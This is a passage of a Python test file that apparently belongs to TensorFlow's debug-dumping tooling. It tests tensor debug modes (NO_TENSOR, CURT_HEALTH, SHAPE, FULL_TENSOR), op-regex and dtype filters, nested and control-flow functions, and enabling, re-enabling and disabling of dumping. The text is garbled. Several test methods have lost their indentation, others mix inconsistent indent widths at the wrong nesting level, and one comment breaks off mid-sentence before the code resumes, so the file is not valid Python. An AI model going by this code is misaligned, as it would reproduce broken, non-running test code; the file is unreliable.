          tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
          self.assertGreaterEqual(tensor_id, 0)
          if trace.op_type == "RealDiv":
            self.assertAllClose(trace.debug_tensor_value, [tensor_id, 1])
          else:
            self.assertAllClose(trace.debug_tensor_value, [tensor_id, 0])
      elif tensor_debug_mode == "CONCISE_HEALTH":
        for trace in graph_exec_traces:
          # 1st element: tensor_id, should be >= 0.
          # 2nd element: element count (8).
          # Remaining 3 elements: The counts of -inf, inf and nan.
          tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
          self.assertGreaterEqual(tensor_id, 0)
          if trace.op_type == "RealDiv":
            self.assertAllClose(trace.debug_tensor_value,
                                [tensor_id, 8, 1, 3, 2])
          else:
            self.assertAllClose(trace.debug_tensor_value,
                                [tensor_id, 8, 0, 0, 0])
      else:  # SHAPE.
        for trace in graph_exec_traces:
          # 1st element: tensor_id, should be >= 0.
          # 2nd element: dtype enum value (float16 = 19).
          # 3rd element: rank (1)
          # 4th element: element count (8).
          # Remaining elements: shape at fixed length (6).
          tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
          self.assertGreaterEqual(tensor_id, 0)
          self.assertAllClose(trace.debug_tensor_value,
                              [tensor_id, 19, 1, 8, 8, 0, 0, 0, 0, 0])
@parameterized.named_parameters(
("Shape", "SHAPE"),
)
@test_util.run_in_graph_and_eager_modes
def testBooleanTensors(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def func(x, y):
return math_ops.logical_not(math_ops.logical_and(x, y))
x = np.array([[False, False], [True, True]], dtype=np.bool)
y = np.array([[False, True], [False, True]], dtype=np.bool)
self.assertAllEqual(
self.evaluate(func(x, y)), [[True, True], [True, False]])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [trace.op_type for trace in graph_exec_traces]
self.assertEqual(executed_op_types, ["LogicalAnd", "LogicalNot"])
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
# 1st element: tensor_id, should be >= 0.
# 2nd element: dtype enum value (bool).
# 3rd element: rank (2).
# 4th element: element count (4).
# Remaining elements: shape at fixed length.
self.assertAllClose(
trace.debug_tensor_value, [tensor_id, 10, 2, 4, 2, 2, 0, 0, 0, 0])
  def testListingSourceFiles(self):
    """The reader lists (host, file-path) pairs, including this test file."""
    writer = dumping_callback.enable_dump_debug_info(self.dump_root)
    # Run a simple eager execution event, so that the source files are dumped.
    self.assertAllClose(math_ops.truediv(7.0, 1.0 / 6.0), 42.0)
    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()
    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
      reader.update()
      source_file_list = reader.source_file_list()
      self.assertIsInstance(source_file_list, tuple)
      # Each entry is a (host_name, file_path) 2-tuple.
      for item in source_file_list:
        self.assertIsInstance(item, tuple)
        self.assertLen(item, 2)
      self.assertIn((_host_name, _current_file_full_path), source_file_list)
  def testReadingSourceLines(self):
    """Dumped source lines for this file match its on-disk contents."""
    writer = dumping_callback.enable_dump_debug_info(self.dump_root)
    # Run a simple eager execution event, so that the source-file contents are
    # dumped.
    self.assertAllClose(math_ops.truediv(7.0, 1.0 / 6.0), 42.0)
    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()
    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
      reader.update()
      with open(_current_file_full_path, "rt") as f:
        file_lines = f.read().split("\n")
      self.assertEqual(
          reader.source_lines(_host_name, _current_file_full_path), file_lines)
  @parameterized.named_parameters(
      ("NoTensor", "NO_TENSOR"),
      ("CurtHealth", "CURT_HEALTH"),
      ("ConciseHealth", "CONCISE_HEALTH"),
      ("Shape", "SHAPE"),
      ("FullTensor", "FULL_TENSOR"),
  )
  @test_util.run_in_graph_and_eager_modes
  def testNestedFunctionExecutionWithoutControlFlow(self, tensor_debug_mode):
    """Dumping covers a tf.function nested inside another tf.function."""
    writer = dumping_callback.enable_dump_debug_info(
        self.dump_root, tensor_debug_mode=tensor_debug_mode)

    @def_function.function
    def log_sum(x, y):
      return math_ops.log(x + y)

    @def_function.function
    def sin1p_log_sum(x, y):
      return math_ops.sin(1.0 + log_sum(x, y))

    x = constant_op.constant(2.0)
    y = constant_op.constant(3.0)
    self.assertAllClose(sin1p_log_sum(x, y), np.sin(1.0 + np.log(5.0)))
    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()

    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
      reader.update()
      outermost_graphs = reader.outermost_graphs()
      self.assertLen(outermost_graphs, 1)

      if context.executing_eagerly():
        # NOTE(b/142486213): Execution of the TF function happens with
        # Session.run() in v1 graph mode, so doesn't get logged to the
        # .execution file.
        executions = reader.executions()
        self.assertLen(executions, 1)
        self.assertIn("sin1p_log_sum", executions[0].op_type)
        # Get the executed graph and verify its identity and inner graph.
        graph = reader.graph_by_id(executions[0].graph_id)
        self.assertEqual(graph.name, "sin1p_log_sum")
        self.assertLen(graph.inner_graph_ids, 1)
        inner_graph = reader.graph_by_id(graph.inner_graph_ids[0])
        self.assertEqual(inner_graph.name, "log_sum")
        # Check device names.
        self.assertLen(executions[0].output_tensor_device_ids, 1)
        self.assertEqual(
            reader.device_name_by_id(executions[0].output_tensor_device_ids[0]),
            self._expectedDefaultDeviceName())
        self.assertIn(self._expectedDefaultDeviceName(),
                      set(reader.device_name_map().values()))

      # Verify the recorded graph-building history.
      add_op_digests = reader.graph_op_digests(op_type="AddV2")
      self.assertLen(add_op_digests, 2)
      self.assertEqual(
          reader.graph_by_id(add_op_digests[0].graph_id).name, "log_sum")
      self.assertEqual(
          reader.graph_by_id(add_op_digests[1].graph_id).name, "sin1p_log_sum")
      log_op_digests = reader.graph_op_digests(op_type="Log")
      self.assertLen(log_op_digests, 1)
      self.assertEqual(
          reader.graph_by_id(log_op_digests[0].graph_id).name, "log_sum")
      sin_op_digests = reader.graph_op_digests(op_type="Sin")
      self.assertLen(sin_op_digests, 1)
      self.assertEqual(
          reader.graph_by_id(sin_op_digests[0].graph_id).name, "sin1p_log_sum")

      # Verify the output tensor IDs and the stack traces.
      for op_digest in add_op_digests + log_op_digests + sin_op_digests:
        # These are all single-output ops.
        self.assertLen(op_digest.output_tensor_ids, 1)
        self.assertGreaterEqual(op_digest.output_tensor_ids[0], 0)
        _, stack_frames = reader.read_graph_op_creation_stack_trace(op_digest)
        self._verifyStackFrames(stack_frames)

      graph_exec_traces = reader.graph_execution_traces()
      executed_op_types = [digest.op_type for digest in graph_exec_traces]
      self.assertEqual(executed_op_types, ["AddV2", "Log", "AddV2", "Sin"])

      # Verify the graph ID stack of each op: graph_ids[-1] is the immediately
      # enclosing graph; graph_ids[-2] (when present) is its outer graph.
      # 1st AddV2 op.
      self.assertEqual(
          reader.graph_by_id(graph_exec_traces[0].graph_ids[-1]).name,
          "log_sum")
      self.assertEqual(
          reader.graph_by_id(graph_exec_traces[0].graph_ids[-2]).name,
          "sin1p_log_sum")
      # Log op.
      self.assertEqual(
          reader.graph_by_id(graph_exec_traces[1].graph_ids[-1]).name,
          "log_sum")
      self.assertEqual(
          reader.graph_by_id(graph_exec_traces[1].graph_ids[-2]).name,
          "sin1p_log_sum")
      # 2nd AddV2 op.
      self.assertEqual(
          reader.graph_by_id(graph_exec_traces[2].graph_ids[-1]).name,
          "sin1p_log_sum")
      # Sin op.
      self.assertEqual(
          reader.graph_by_id(graph_exec_traces[3].graph_ids[-1]).name,
          "sin1p_log_sum")

      if tensor_debug_mode == "NO_TENSOR":
        # Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
        # to be an empty float32 tensor.
        for trace in graph_exec_traces:
          self.assertIsNone(trace.debug_tensor_value)
      elif tensor_debug_mode == "CURT_HEALTH":
        # Test the association between graph exec and prior graph building.
        # In each case, the 1st element of debug_tensor_value is the ID of the
        # symbolic tenosr and the 2nd element is a zero indicating there is no
        # inf or nan.
        self.assertAllClose(
            graph_exec_traces[0].debug_tensor_value,
            [add_op_digests[0].output_tensor_ids[0], 0.0])  # 1st AddV2 op.
        self.assertAllClose(
            graph_exec_traces[1].debug_tensor_value,
            [log_op_digests[0].output_tensor_ids[0], 0.0])  # Log op.
        self.assertAllClose(
            graph_exec_traces[2].debug_tensor_value,
            [add_op_digests[1].output_tensor_ids[0], 0.0])  # 2nd AddV2 op.
        self.assertAllClose(
            graph_exec_traces[3].debug_tensor_value,
            [sin_op_digests[0].output_tensor_ids[0], 0.0])  # Sin op.
      elif tensor_debug_mode == "CONCISE_HEALTH":
        # 1st element: tensor_id, should be >= 0.
        # 2nd element: element count. Remaining elements: all zero because there
        # is no -inf, inf or nan.
        # 1st AddV2 op.
        self.assertAllClose(
            graph_exec_traces[0].debug_tensor_value,
            [add_op_digests[0].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
        # Log op.
        self.assertAllClose(
            graph_exec_traces[1].debug_tensor_value,
            [log_op_digests[0].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
        # 2nd AddV2 op.
        self.assertAllClose(
            graph_exec_traces[2].debug_tensor_value,
            [add_op_digests[1].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
        # Sin op.
        self.assertAllClose(
            graph_exec_traces[3].debug_tensor_value,
            [sin_op_digests[0].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
      elif tensor_debug_mode == "SHAPE":
        # 1st element: tensor_id.
        # 2nd element: dtype (float32).
        # 3rd element: rank (scalar).
        # 4th element: element count (1).
        # Remaining elements: shape padded to fixed length (6).
        # 1st AddV2 op.
        self.assertAllClose(
            graph_exec_traces[0].debug_tensor_value,
            [add_op_digests[0].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
        # Log op.
        self.assertAllClose(
            graph_exec_traces[1].debug_tensor_value,
            [log_op_digests[0].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
        # 2nd AddV2 op.
        self.assertAllClose(
            graph_exec_traces[2].debug_tensor_value,
            [add_op_digests[1].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
        # Sin op.
        self.assertAllClose(
            graph_exec_traces[3].debug_tensor_value,
            [sin_op_digests[0].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
      else:  # FULL_TENSOR.
        full_tensor_values = [
            reader.graph_execution_trace_to_tensor_value(trace)
            for trace in graph_exec_traces]
        self.assertAllClose(full_tensor_values[0], 5.0)  # 1st AddV2 op.
        self.assertAllClose(full_tensor_values[1], np.log(5.0))  # Log op.
        self.assertAllClose(
            full_tensor_values[2], np.log(5.0) + 1.0)  # 2nd AddV2 op.
        self.assertAllClose(
            full_tensor_values[3], np.sin(np.log(5.0) + 1.0))  # Sin op.
  def testCapturingExecutedGraphIdsOfTwoCompilationsOfSameFunction(self):
    """Test correct executed IDs of two FuncGraphs from the same Py function."""
    writer = dumping_callback.enable_dump_debug_info(
        self.dump_root, tensor_debug_mode="NO_TENSOR")

    @def_function.function
    def ceil_times_two(x):
      return math_ops.ceil(x) * 2.0

    # float32 vs float64 inputs trigger two separate concrete-function
    # tracings of the same Python function.
    x_float32 = np.array(3.5, dtype=np.float32)
    x_float64 = np.array(4.5, dtype=np.float64)
    # Four executions, with two different FuncGraphs, which should lead
    # to two unique executed graph IDs (see assertion below).
    self.assertAllClose(ceil_times_two(x_float32), 8.0)
    self.assertAllClose(ceil_times_two(x_float64), 10.0)
    self.assertAllClose(ceil_times_two(x_float32), 8.0)
    self.assertAllClose(ceil_times_two(x_float64), 10.0)
    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()

    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
      reader.update()
      executions = reader.executions()
      self.assertLen(executions, 4)
      for execution in executions:
        self.assertStartsWith(execution.op_type, "__inference_ceil_times_two_")
      executed_graph_ids = [execution.graph_id for execution in executions]
      self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
      self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
      self.assertNotEqual(executed_graph_ids[0], executed_graph_ids[1])
      self.assertNotEqual(executed_graph_ids[2], executed_graph_ids[3])
      for executed_graph_id in executed_graph_ids:
        self.assertEqual(
            reader.graph_by_id(executed_graph_id).name, "ceil_times_two")
  def testCapturingExecutedGraphIdsOfDuplicateFunctionNames(self):
    """Two FuncGraphs compiled from Python functions with identical names."""
    writer = dumping_callback.enable_dump_debug_info(
        self.dump_root, tensor_debug_mode="NO_TENSOR")

    class TestClass(object):

      @def_function.function
      def ceil_times_two(self, x):
        return math_ops.ceil(x) * 2.0

    # The `ceil_times_two` method of the two objects will be compiled
    # into separate FuncGraphs.
    test_object_1 = TestClass()
    test_object_2 = TestClass()
    x = np.array(3.5, dtype=np.float32)
    # Four executions, with two different FuncGraphs, which should lead
    # to two unique executed graph IDs (see assertion below).
    self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
    self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
    self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
    self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()

    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
      reader.update()
      executions = reader.executions()
      self.assertLen(executions, 4)
      for execution in executions:
        self.assertStartsWith(execution.op_type, "__inference_ceil_times_two_")
      executed_graph_ids = [execution.graph_id for execution in executions]
      self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
      self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
      self.assertNotEqual(executed_graph_ids[0], executed_graph_ids[1])
      self.assertNotEqual(executed_graph_ids[2], executed_graph_ids[3])
      for executed_graph_id in executed_graph_ids:
        self.assertEqual(
            reader.graph_by_id(executed_graph_id).name, "ceil_times_two")
  @parameterized.named_parameters(
      ("AddV2", "AddV2"),
      ("Log", "Log"),
      ("AddV2AndLog", "(AddV2|Log)"),
  )
  @test_util.run_in_graph_and_eager_modes
  def testOpRegex(self, op_regex):
    """op_regex filters which ops get execution traces, not graph building."""
    writer = dumping_callback.enable_dump_debug_info(
        self.dump_root, tensor_debug_mode="FULL_TENSOR",
        op_regex=op_regex)

    @def_function.function
    def log_sum(x, y):
      return math_ops.log(x + y)

    @def_function.function
    def sin1p_log_sum(x, y):
      return math_ops.sin(1.0 + log_sum(x, y))

    x = constant_op.constant(2.0)
    y = constant_op.constant(3.0)
    self.assertAllClose(
        self.evaluate(sin1p_log_sum(x, y)), np.sin(1.0 + np.log(5.0)))
    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()

    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
      reader.update()
      # Graph-building history is recorded for all ops regardless of op_regex.
      graph_op_digests = reader.graph_op_digests()
      op_types = [digest.op_type for digest in graph_op_digests]
      self.assertIn("AddV2", op_types)
      self.assertIn("Log", op_types)
      self.assertIn("Sin", op_types)

      graph_exec_digests = reader.graph_execution_traces(digest=True)
      executed_op_types = [digest.op_type for digest in graph_exec_digests]
      tensor_values = [reader.graph_execution_trace_to_tensor_value(digest)
                       for digest in graph_exec_digests]
      if op_regex == "AddV2":
        self.assertEqual(executed_op_types, ["AddV2", "AddV2"])
        self.assertLen(tensor_values, 2)
        self.assertAllClose(tensor_values[0], 5.0)  # 1st AddV2 op.
        self.assertAllClose(
            tensor_values[1], np.log(5.0) + 1.0)  # 2nd AddV2 op.
      elif op_regex == "Log":
        self.assertEqual(executed_op_types, ["Log"])
        self.assertLen(tensor_values, 1)
        self.assertAllClose(tensor_values[0], np.log(5.0))  # Log op.
      else:  # "(AddV2|Log)"
        self.assertEqual(executed_op_types, ["AddV2", "Log", "AddV2"])
        self.assertLen(tensor_values, 3)
        self.assertAllClose(tensor_values[0], 5.0)  # 1st AddV2 op.
        self.assertAllClose(tensor_values[1], np.log(5.0))  # Log op.
        self.assertAllClose(
            tensor_values[2], np.log(5.0) + 1.0)  # 2nd AddV2 op.
  def testIncorrectTensorDTypeArgFormatLeadsToError(self):
    """Malformed tensor_dtypes arguments raise ValueError or TypeError."""
    with self.assertRaisesRegexp(
        ValueError,
        r".*expected.*list.*tuple.*callable.*but received.*\{\}"):
      dumping_callback.enable_dump_debug_info(self.dump_root,
                                              tensor_dtypes=dict())
    with self.assertRaisesRegexp(
        ValueError,
        r".*expected.*list.*tuple.*callable.*but received.*"):
      dumping_callback.enable_dump_debug_info(self.dump_root,
                                              tensor_dtypes="float32")
    with self.assertRaisesRegexp(
        ValueError,
        r".*expected.*list.*tuple.*callable.*but received.*"):
      dumping_callback.enable_dump_debug_info(
          self.dump_root, tensor_dtypes=dtypes.float32)
    # A list of callables (rather than a single callable) is also rejected.
    with self.assertRaises(TypeError):
      dumping_callback.enable_dump_debug_info(self.dump_root, tensor_dtypes=[
          lambda dtype: dtype.is_floating, lambda dtype: dtype.is_integer])
  @parameterized.named_parameters(
      ("float", [dtypes.float32], None),
      ("float_only_sum", ["float32"], "Sum"),
      ("float_no_sum", (dtypes.float32,), "(?!Sum)"),
      ("int", [dtypes.int32], None),
      ("int_via_lambda", lambda dtype: dtype.is_integer, None),
      ("exclude_Sum", None, "(?!Sum)"),
      ("All", None, None),
  )
  @test_util.run_in_graph_and_eager_modes
  def testTensorDTypesAndOpRegexFilters(self,
                                        tensor_dtypes,
                                        op_regex):
    """tensor_dtypes and op_regex filters compose (logical AND) on traces."""
    writer = dumping_callback.enable_dump_debug_info(
        self.dump_root, tensor_debug_mode="FULL_TENSOR",
        tensor_dtypes=tensor_dtypes,
        op_regex=op_regex)

    @def_function.function
    def unique_sum(xs):
      """Sum over the unique values, for testing."""
      unique_xs, indices = array_ops.unique(xs)
      return math_ops.reduce_sum(unique_xs), indices

    xs = constant_op.constant([2., 6., 8., 1., 2.], dtype=dtypes.float32)
    y, indices = self.evaluate(unique_sum(xs))
    self.assertAllClose(y, 17.)
    self.assertAllEqual(indices, [0, 1, 2, 3, 0])
    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()

    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
      reader.update()
      graph_exec_digests = reader.graph_execution_traces(digest=True)
      executed_op_types = [digest.op_type for digest in graph_exec_digests]
      tensor_values = [reader.graph_execution_trace_to_tensor_value(digest)
                       for digest in graph_exec_digests]

      # One branch per parameterized case; Unique has a float32 values output
      # and an int32 indices output, so the dtype filter selects between them.
      if tensor_dtypes == [dtypes.float32] and not op_regex:
        self.assertEqual(executed_op_types, ["Unique", "Sum"])
        self.assertLen(tensor_values, 2)
        self.assertAllClose(tensor_values[0], [2, 6, 8, 1])  # Unique values.
        self.assertAllClose(tensor_values[1], 17.)  # Sum.
      elif tensor_dtypes == ["float32"] and op_regex == "Sum":
        self.assertEqual(executed_op_types, ["Sum"])
        self.assertLen(tensor_values, 1)
        self.assertAllClose(tensor_values[0], 17.)  # Sum.
      elif tensor_dtypes == (dtypes.float32,) and op_regex == "(?!Sum)":
        self.assertEqual(executed_op_types, ["Unique"])
        self.assertLen(tensor_values, 1)
        self.assertAllClose(tensor_values[0], [2, 6, 8, 1])  # Unique values.
      elif tensor_dtypes == [dtypes.int32] and not op_regex:
        self.assertEqual(executed_op_types, ["Unique"])
        self.assertLen(tensor_values, 1)
        self.assertAllEqual(
            tensor_values[0], [0, 1, 2, 3, 0])  # Unique indices.
      elif callable(tensor_dtypes) and not op_regex:
        self.assertEqual(executed_op_types, ["Unique"])
        self.assertLen(tensor_values, 1)
        self.assertAllEqual(
            tensor_values[0], [0, 1, 2, 3, 0])  # Unique indices.
      elif not tensor_dtypes and op_regex == "(?!Sum)":
        self.assertEqual(executed_op_types, ["Unique", "Unique"])
        self.assertLen(tensor_values, 2)
        self.assertAllClose(tensor_values[0], [2, 6, 8, 1])  # Unique values.
        self.assertAllEqual(
            tensor_values[1], [0, 1, 2, 3, 0])  # Unique indices.
      else:  # "All".
        self.assertEqual(executed_op_types, ["Unique", "Unique", "Sum"])
        self.assertLen(tensor_values, 3)
        self.assertAllClose(tensor_values[0], [2, 6, 8, 1])  # Unique values.
        self.assertAllEqual(
            tensor_values[1], [0, 1, 2, 3, 0])  # Unique indices.
        self.assertAllClose(tensor_values[2], 17)  # Sum.
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testFunctionExecutionWithControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0
i += 1
return x
x = constant_op.constant(0.5, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 8.0)
writer.FlushNonExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_op_digests = reader.graph_op_digests()
op_types = [digest.op_type for digest in graph_op_digests]
self.assertIn("Less", op_types)
self.assertIn("Mul", op_types)
self.assertIn("AddV2", op_types)
# Before FlushExecutionFiles() is called, the .execution and
# .graph_execution_traces files should be both empty.
self.assertEqual(reader.num_executions(), 0)
self.assertEqual(reader.num_graph_execution_traces(), 0)
# TODO(cais): Backport execution instrumentation to tf.Session.
writer.FlushExecutionFiles()
# After the flushing, the .execution file should hold the appropriate
# contents.
reader.update()
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
executions = reader.executions()
self.assertLen(executions, 1)
executed_op_types = [execution.op_type for execution in executions]
self.assertIn("iterative_doubling", executions[0].op_type)
execution = executions[0]
self.assertLen(execution.input_tensor_ids, 2)
self.assertLen(execution.output_tensor_ids, 1)
self.assertEqual(
debug_event_pb2.TensorDebugMode.keys()[execution.tensor_debug_mode],
tensor_debug_mode)
if tensor_debug_mode == "FULL_TENSOR":
tensor_values = reader.execution_to_tensor_values(execution)
self.assertAllClose(tensor_values, [8.0])
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [trace.op_type for trace in graph_exec_traces]
if tensor_debug_mode != "CURT_HEALTH":
# Less outputs a boolean tensor, which is not tracked under CURT_HEALTH.
# The Less op should have been executed 5 times.
self.assertEqual(executed_op_types.count("Less"), 5)
# The last executed op should be Less.
self.assertEqual(executed_op_types[-1], "Less")
# AddV2 produces an int tensor, which is not tracked under CURT_HEALTH.
# The AddV2 op should have been run, but we refrain from asserting on
# how many times it's executed.
self.assertIn("AddV2", executed_op_types)
for trace in graph_exec_traces:
self.assertEqual(trace.output_slot, 0)
# The Mul op should have been executed 4 times.
self.assertEqual(executed_op_types.count("Mul"), 4)
tensor_values = [reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces]
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertAllEqual(tensor_value, [])
elif tensor_debug_mode == "CURT_HEALTH":
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
# 1st element: tensor_id; 2nd element: 0 indicating no inf or nan.
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 0.0])
elif tensor_debug_mode == "FULL_TENSOR":
less_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces if trace.op_type == "Less"]
self.assertAllEqual(less_values, [True, True, True, True, False])
mul_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces if trace.op_type == "Mul"]
self.assertAllClose(mul_values, [1.0, 2.0, 4.0, 8.0])
def testCallingEnableTracingTwiceWithTheSameDumpRootIsIdempotent(self):
    """Enabling dumping twice with the same dump root must not duplicate data.

    The second enable_dump_debug_info() call with an identical dump root
    should reuse the existing writer, so the two Unique executions below
    are recorded exactly once each.
    """
    dumping_callback.enable_dump_debug_info(self.dump_root)
    writer = dumping_callback.enable_dump_debug_info(self.dump_root)

    x = constant_op.constant([10.0, 12.0, 10.0])
    for _ in range(2):
        array_ops.unique(x)

    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()

    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
        reader.update()
        executions = reader.executions()
        # Exactly two executions: one per array_ops.unique() call above.
        self.assertLen(executions, 2)
        for execution in executions:
            self.assertGreater(execution.wall_time, 0)
            self.assertEqual(execution.op_type, "Unique")
            # Unique returns (values, indices), hence two outputs.
            self.assertEqual(execution.num_outputs, 2)
            _, stack_frames = reader.read_execution_stack_trace(execution)
            self._verifyStackFrames(stack_frames)
def testCallingEnableTracingTwiceWithDifferentDumpRootsOverwrites(self):
    """A second enable call with a new dump root redirects all dumping there.

    After re-enabling with `new_dump_root`, execution data must land only in
    the new root; the old root stays empty.
    """
    dumping_callback.enable_dump_debug_info(self.dump_root)
    new_dump_root = self.dump_root + "_new_dump_root"
    writer = dumping_callback.enable_dump_debug_info(new_dump_root)

    x = constant_op.constant([10.0, 12.0, 10.0])
    for _ in range(2):
        array_ops.unique(x)

    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()

    with debug_events_reader.DebugDataReader(new_dump_root) as reader:
        reader.update()
        executions = reader.executions()
        self.assertLen(executions, 2)
        for execution in executions:
            self.assertGreater(execution.wall_time, 0)
            self.assertEqual(execution.op_type, "Unique")
            # Unique returns (values, indices), hence two outputs.
            self.assertEqual(execution.num_outputs, 2)
            _, stack_frames = reader.read_execution_stack_trace(execution)
            self._verifyStackFrames(stack_frames)

    with debug_events_reader.DebugDataReader(
        self.dump_root) as old_dump_root_reader:
        old_dump_root_reader.update()
        # The old dump root shouldn't have been written to.
        self.assertEqual(old_dump_root_reader.num_executions(), 0)
        self.assertFalse(old_dump_root_reader.outermost_graphs())
def testCallingEnableRepeatedlyWithDifferentTensorDebugMode(self):
    """Assert calling enable_dump_debug_info() with two tensor-debug modes.

    It should lead to overwriting of the previously-configured mode.
    """
    writer = dumping_callback.enable_dump_debug_info(
        self.dump_root, tensor_debug_mode="NO_TENSOR")

    @def_function.function
    def add_1_divide_by_2(x):
        return (x + 1.0) / 2.0

    self.assertAllClose(add_1_divide_by_2(constant_op.constant(4.0)), 2.5)
    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()
    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
        reader.update()
        graph_exec_digests = reader.graph_execution_traces(digest=True)
        tensor_values = [reader.graph_execution_trace_to_tensor_value(digest)
                         for digest in graph_exec_digests]
        for tensor_value in tensor_values:
            # Under NO_TENSOR mode, each tensor is summarized as an empty float32
            # array.
            self.assertAllEqual(tensor_value, [])

    # Re-enabling with a *different* tensor-debug mode is rejected.
    # NOTE(review): assertRaisesRegexp is a deprecated alias of
    # assertRaisesRegex; presumably kept here for Python 2 compatibility.
    with self.assertRaisesRegexp(
        ValueError, r"already.*NO_TENSOR.*FULL_TENSOR.*not be honored"):
        dumping_callback.enable_dump_debug_info(
            self.dump_root, tensor_debug_mode="FULL_TENSOR")
@parameterized.named_parameters(
    ("NoTensor", "NO_TENSOR"),
    ("FullTensor", "FULL_TENSOR"),
)
def testDisableTracingWorks(self, tensor_debug_mode):
    """After disable_dump_debug_info(), op execution leaves no dump data."""
    writer = dumping_callback.enable_dump_debug_info(
        self.dump_root, tensor_debug_mode=tensor_debug_mode)
    # Disable immediately: the ops below must not be recorded.
    dumping_callback.disable_dump_debug_info()

    x = constant_op.constant([10.0, 12.0, 10.0])
    for _ in range(2):
        array_ops.unique(x)

    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()
    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
        reader.update()
        # No executions, graph traces, or graphs should have been dumped.
        self.assertEqual(reader.num_executions(), 0)
        self.assertEqual(reader.num_graph_execution_traces(), 0)
        self.assertFalse(reader.outermost_graphs())
@parameterized.named_parameters(
    ("NoTensor", "NO_TENSOR"),
    ("CurtHealth", "CURT_HEALTH"),
    ("ConciseHealth", "CONCISE_HEALTH"),
    ("Shape", "SHAPE"),
    ("FullTensor", "FULL_TENSOR"),
)
def testMultiThreadedExecutionWithSameSetting(self, tensor_debug_mode):
    """Dumping from multiple threads using the same setting."""
    writer = dumping_callback.enable_dump_debug_info(
        self.dump_root, tensor_debug_mode=tensor_debug_mode)
    x = variables.Variable(10.0, dtype=dtypes.float32)
    y = variables.Variable(3.0, dtype=dtypes.float32)

    @def_function.function
    def increase_x():
        return x.assign_add(y * 2.0)

    # One warm-up call on the main thread, then three concurrent calls.
    increase_x()

    num_threads = 3
    threads = []
    for _ in range(num_threads):
        threads.append(threading.Thread(target=increase_x))
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    # 10 --> 16 --> 22 --> 28 --> 34.
    self.assertAllClose(x.read_value(), 34.0)

    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()

    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
        reader.update()
        exec_digests = reader.executions(digest=True)
        # Wall times must be monotonically non-decreasing in reader order.
        prev_wall_time = 1
        for exec_digest in exec_digests:
            self.assertGreaterEqual(exec_digest.wall_time, prev_wall_time)
            prev_wall_time = exec_digest.wall_time

        graph_exec_traces = reader.graph_execution_traces()
        executed_op_types = [trace.op_type for trace in graph_exec_traces]
        self.assertEqual(executed_op_types.count("Mul"), 1 + num_threads)
        self.assertEqual(
